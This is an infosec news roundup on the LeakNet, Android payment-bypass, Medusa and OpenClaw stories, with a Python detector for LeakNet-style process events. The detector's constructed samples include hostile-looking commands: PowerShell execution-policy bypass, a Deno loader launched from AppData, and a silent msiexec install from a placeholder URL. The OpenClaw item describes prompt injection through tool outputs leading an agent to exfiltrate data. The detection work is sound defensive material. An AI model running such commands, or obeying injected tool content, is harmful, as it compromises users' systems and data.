    InfoSec News Nuggets 03/18/2026 – AboutDFIR

By admin, March 21, 2026
    LeakNet Ransomware Uses ClickFix and Deno Runtime for Stealthy Attacks

ReliaQuest researchers have documented a significant tactical evolution by the LeakNet ransomware operation, a group active since late 2024 that averages roughly three victims per month. The group has adopted ClickFix social engineering lures for initial access and now deploys a loader built on the legitimate open-source Deno JavaScript runtime to execute malicious payloads directly in memory, leaving minimal forensic evidence on disk and appearing to endpoint security tools as normal developer activity. The Deno-based loader is invoked through Visual Basic Script and PowerShell files deliberately named Romeo*.ps1 and Juliet*.vbs. Once it executes, it fingerprints the host, generates a unique victim ID, connects to C2 infrastructure, and establishes a persistent polling loop for new commands. Post-exploitation tradecraft includes DLL sideloading via a Java binary in C:\ProgramData\USOShared, credential discovery via klist Kerberos ticket enumeration, lateral movement through PsExec, and data exfiltration staged to Amazon S3. ReliaQuest noted that LeakNet’s adoption of ClickFix mirrors recent moves by Termite and Interlock, suggesting ClickFix is now a mainstream ransomware access technique rather than an experimental one. Defenders can watch for specific detection triggers, including Deno running outside development environments, suspicious msiexec execution from browsers, abnormal PsExec usage, and unexpected outbound S3 traffic. (Note: BleepingComputer blocks automated fetches but is fully accessible in-browser.)
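An added detection example, not from the ReliaQuest write-up or the original post, that applies the triggers above to constructed Windows process-creation events: the Romeo*/Juliet* lure file names, a Deno process started by something other than a developer tool or from a user-writable path, msiexec launched by a browser, and PsExec binaries. The allow-list of development parents, the browser and PsExec image names, and the sample events are all assumptions constructed for illustration.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    parent: str    # parent image name
    image: str     # child image name
    cmdline: str   # full command line of the child

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
# Assumed allow-list: parents under which deno.exe is expected on developer hosts
DEV_PARENTS = {"code.exe", "windowsterminal.exe", "cmd.exe"}
PSEXEC_IMAGES = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}
# Lure file names reported in the post: Romeo*.ps1 and Juliet*.vbs
LURE_NAME = re.compile(r"\\(Romeo[^\\]*\.ps1|Juliet[^\\]*\.vbs)\b", re.IGNORECASE)
# Script launched from a user-writable location rather than a project checkout
USER_WRITABLE = re.compile(r"\\(AppData|ProgramData|Temp|Public)\\", re.IGNORECASE)

def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every detection trigger the event matches."""
    parent, image, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline
    hits = []
    if LURE_NAME.search(cmd):
        hits.append("lure-script-name")
    if image == "deno.exe" and parent not in DEV_PARENTS:
        hits.append("deno-outside-dev")
    if image == "deno.exe" and USER_WRITABLE.search(cmd):
        hits.append("deno-user-writable-script")
    if image == "msiexec.exe" and parent in BROWSERS:
        hits.append("msiexec-from-browser")
    if image in PSEXEC_IMAGES:
        hits.append("psexec")
    return hits

def triage(events: list[ProcEvent]) -> list[tuple[str, str]]:
    """Flatten (image, trigger) pairs for every flagged event."""
    return [(ev.image, hit) for ev in events for hit in classify(ev)]

# Constructed sample events (not real telemetry); the first two are benign dev activity.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "code.exe", "code.exe"),
    ProcEvent("code.exe", "deno.exe", "deno run main.ts"),
    ProcEvent("explorer.exe", "wscript.exe", r"wscript.exe C:\Users\bob\Downloads\Juliet3.vbs"),
    ProcEvent("wscript.exe", "powershell.exe", r"powershell -ep bypass -f C:\Users\bob\AppData\Roaming\Romeo7.ps1"),
    ProcEvent("powershell.exe", "deno.exe", r"deno run -A C:\Users\bob\AppData\Roaming\loader.js"),
    ProcEvent("chrome.exe", "msiexec.exe", "msiexec /i https://example.invalid/pkg.msi /qn"),
    ProcEvent("services.exe", "PSEXESVC.exe", "PSEXESVC.exe"),
]

if __name__ == "__main__":
    for image, hit in triage(SAMPLE_EVENTS):
        print(f"{hit:28} {image}")
```

The benign Deno run under the editor produces no hits, while the same binary launched by PowerShell from AppData trips two triggers; in production the parent allow-list and path patterns would be tuned to the organisation's actual developer tooling.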


    Android OS-Level Attack Bypasses Mobile Payment Security

CloudSEK researchers have disclosed an attack technique that uses the LSPosed framework, an Xposed-based module system widely used on rooted Android devices, to intercept and manipulate communications between legitimate payment applications and the operating system at runtime. The technique bypasses SIM-binding authentication, spoofs device identities, and extracts 2FA SMS messages in real time without modifying a single line of the targeted app’s code, leaving app signatures intact and Google Play Protect untriggered. Central to the attack is a module called “Digital Lutera” that uses standard Android APIs to hook into system-level processes, abusing SIM-binding’s fundamental design assumption that the physical SIM in the device is controlled by the legitimate user, an assumption that breaks entirely once OS-level code is compromised. CloudSEK warned that the technique is particularly difficult to detect because it operates below the application layer, where most mobile security tools focus, and recommended that financial institutions layer behavioral analytics, transaction anomaly detection, and device attestation on top of certificate pinning or Play Integrity checks to catch attacks that bypass the application entirely.


    Medusa Ransomware Gang Claims Attacks on Prominent Mississippi Hospital, New Jersey County

The Russia-assessed Medusa ransomware operation has formally claimed responsibility for the late-February cyberattack on the University of Mississippi Medical Center, the state’s only children’s hospital, only Level I trauma center, only Level IV neonatal intensive care unit, and sole organ transplant provider. The attack knocked all systems offline for nine days and forced clinical staff across oncology, radiology, and inpatient units to revert entirely to analog operations; Medusa is demanding $800,000 and threatening to publish exfiltrated data by March 20 if unpaid. In a separate simultaneous claim, Medusa listed Passaic County, New Jersey as a victim and demanded an identical $800,000 ransom, adding to a growing 2026 tally of dozens of county and city governments hit by ransomware nationwide. This reflects a deliberate refocusing by Medusa and peer operations away from large metropolitan areas, which have attracted heavy federal scrutiny, toward smaller municipalities and mid-sized health systems assessed as having limited IR capability and higher pressure to pay. The FBI has previously warned that Medusa has engaged in “triple extortion” schemes in which a second actor, posing as a separate ransomware group, demands additional payment after the victim has already paid the original ransom, claiming the first payment was stolen and a new decryptor is needed.


    OpenClaw AI Agent Flaws Could Enable Prompt Injection and Data Exfiltration

China’s national cybersecurity authority CNCERT has published an advisory warning that OpenClaw, a widely deployed open-source AI agent framework used by Chinese government ministries, state-owned enterprises, and dozens of private sector firms, contains multiple critical security flaws that could allow prompt injection attacks and unauthorized data exfiltration, and has restricted its use on government systems pending patches. The flaws, discovered by Tsinghua University researchers, stem from OpenClaw’s default trust model, which treats all tool outputs and external data sources as equally trustworthy as user instructions. As a result, maliciously crafted documents, web pages, or API responses can silently redirect the agent’s behavior, enabling attackers to exfiltrate sensitive files, execute arbitrary system commands, or pivot to other services the agent has access to, without any user interaction. The disclosure is significant both for its subject matter, a government authority publicly warning about security flaws in a domestic AI product, and for its downstream implications for Western security teams: OpenClaw has been adopted in several international research collaborations, and its architecture mirrors assumptions baked into many Western AI agent frameworks that have not yet undergone equivalent scrutiny.


    Trump Administration Isn’t Pushing Companies to Conduct Cyber Offense, National Cyber Director Says

National Cyber Director Sean Cairncross sought to clarify language in the recently released Trump national cyber strategy at an Auburn University McCrary Institute event Tuesday, drawing a sharp distinction between the document’s call to “incentivize companies to disrupt adversary networks” and any expectation that private sector firms would conduct offensive cyber campaigns. He insisted the administration’s intent is for industry to share threat intelligence and illuminate the battlefield so that the U.S. government can conduct the actual offensive operations. Cairncross described the vision as a “spear from the United States government” backed by private sector intelligence, referencing the FBI’s “joint sequenced operations” model, in which private threat intelligence triggers coordinated government arrests, sanctions, and infrastructure takedowns, as the template the strategy is meant to scale. The clarification was notable given that cybersecurity lawyers and former government officials had flagged the strategy’s offensive language as legally ambiguous and potentially inviting firms to believe they had implicit government backing for “hack-back” operations, which remain illegal under the Computer Fraud and Abuse Act absent explicit authorization.
